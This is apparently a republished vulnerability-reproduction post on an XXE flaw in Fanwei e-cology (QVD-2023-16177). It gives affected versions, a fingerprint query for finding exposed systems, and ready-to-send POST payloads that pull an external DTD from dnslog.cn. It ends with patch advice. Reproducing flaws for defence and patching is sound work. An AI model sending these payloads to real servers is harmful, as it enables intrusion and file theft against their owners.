Panwei E-Cology XXE Vulnerability Reappearance (QVD-2023-16177)

News 2023-08-16 02:43:13 views: null

0x01 Product Introduction

      Pan-micro collaborative management application platform E-Cology is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, data center functions Enterprise large-scale collaborative management platform.

0x02 Vulnerability Overview

   A certain function point of Fanwei e-cology initially does not filter user input perfectly, which can trigger XXE when processing user input. Subsequent repair rules can still be bypassed, and this vulnerability is the bypass of the previous repair rules. Attackers can exploit this vulnerability to list directories, read files, and even gain administrator privileges of the application system.

0x03 range of influence

  Fanwei EC 9.x and patch version < 10.58.2

  Fanwei EC 8.x and patch version < 10.58.2

0x04 Recurrence environment 

Intergraph fingerprint: app.name="Fanwei e-cology 9.0 OA"

d118863013174d94b22490499a6f40c1.png 

0x05 Vulnerability Reappearance 

PoC

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<M><syscode>&send;</syscode></M>

b34738e52adf424f9d3925e6b63874f5.png

 If the above response appears, there is a loophole

 exp1

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

exp2 

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>

PS: The difference is that the vulnerability path is different

verify:

80cfc3a31d5e4e799eaf776f463102b8.png

3d4ec925c20b4e01ad7a53ddade1981e.png c4c605a74b604ee3afd1e9e5dbe4306e.png

 262391643b024a058f440175499ad852.png

0x06 Repair suggestion 

interim mitigation plan

Limit access source addresses, and do not open the system to the Internet unless necessary.

Upgrade Repair Solution

At present, 10.58.2 has been officially released to fix this vulnerability. It is recommended that affected users update to 10.58.2:

https://www.weaver.com.cn/cs/securityDownload.html#

 

 

 

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/131878446
Recommended
wlnmp one-click installation package update 240522
ChatGPT was severely down and was rumored to have been hacked by Russian hackers.
Ranking
Java implementation Storage Structure queue
Android development Yabo Sports Start Tutorial
Let me catch it! There are a lot of interesting souls, not many interesting books, Redis in-depth adventure subverts your understanding of Redis
easyrecovery software 2024 free version computer file data recovery tool
Deep Understanding of Virtual Private Networks: How VPNs Connect the World
EOS was looted, not without reason
Construction of chromium GN system
Comprehensive summary of JAVA basic knowledge [New students must see and learn together]
Fall in love with [data structures] Quick Sort
OpenCV implements FAST algorithm corner point detection and ORB algorithm feature point detection
Daily
More
2024-05-22(9)
2024-05-21(35)
2024-05-20(5)
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)

Code World

© 2018 codetd.com